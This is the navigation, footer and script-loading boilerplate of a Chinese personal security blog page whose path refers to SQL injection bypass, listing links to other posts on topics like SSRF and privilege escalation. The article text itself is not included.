target="_blank"><i class="ic i-address-card"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-user"></i>关于</a><ul class="submenu"><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于本站</a></li><li class="item"><a href="/admiration/" rel="section"><i class="ic i-coffee"></i>赞赏博主</a></li></ul></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2023/10/30/network-security/neiwang/%E5%9F%9F%E7%8E%AF%E5%A2%83/%E5%9F%9F%E7%8E%AF%E5%A2%83/">域环境</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2024/05/04/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/php%E5%BE%AA%E7%8E%AF/">php循环</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/">linux提权</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a></div><span><a href="/2023/11/09/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/07/network-security/neiwang/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/">Token窃取利用</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/Cloud-Security/" title="分类于云安全">云安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/Cloud-Security/docker/" title="分类于docker">docker</a></div><span><a href="/2023/10/27/%E6%BC%8F%E6%B4%9E/docker%E9%80%83%E9%80%B8/">docker逃逸</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a></div><span><a href="/2024/05/08/%E6%BC%8F%E6%B4%9E/ssrf%E6%BC%8F%E6%B4%9E/">ssrf漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2023/12/12/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/PHP%E8%BF%90%E7%AE%97%E7%AC%A6/if-else/">if-else</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2023/11/16/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/php%E8%AF%AD%E6%B3%95-%E5%8F%98%E9%87%8F/php%E8%AF%AD%E6%B3%95-%E5%8F%98%E9%87%8F/">php语法-变量</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/Cloud-Security/" title="分类于云安全">云安全</a></div><span><a href="/2024/02/19/network-security/Cloud-Security/%E5%85%AC%E6%9C%89%E4%BA%91/">公有云</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2><ul class="leancloud-recent-comment" id="new-comment"></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">云逸 @ 云逸'bolg</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">257k 字</span><span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">3:54</span></div><div class="powered-by">基于 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & Theme.<a href="https://github.com/theme-shoka-x/hexo-theme-shokaX/" rel="noopener" target="_blank">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
        path: `2023/11/02/漏洞/sql注入绕过/`,
        favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,
    chart: false,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=default,fetch"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.0.2/pace.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/algoliasearch/4.12.1/algoliasearch-lite.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/instantsearch.js/4.39.0/instantsearch.production.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/quicklink/2.2.0/quicklink.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/??jquery/3.5.1/jquery.min.js,fancybox/3.5.7/jquery.fancybox.min.js,justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js" async></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/KaTeX/0.15.2/contrib/copy-tex.min.js" async></script><script src="/js/app.js?v=0.3.6"></script></body></html>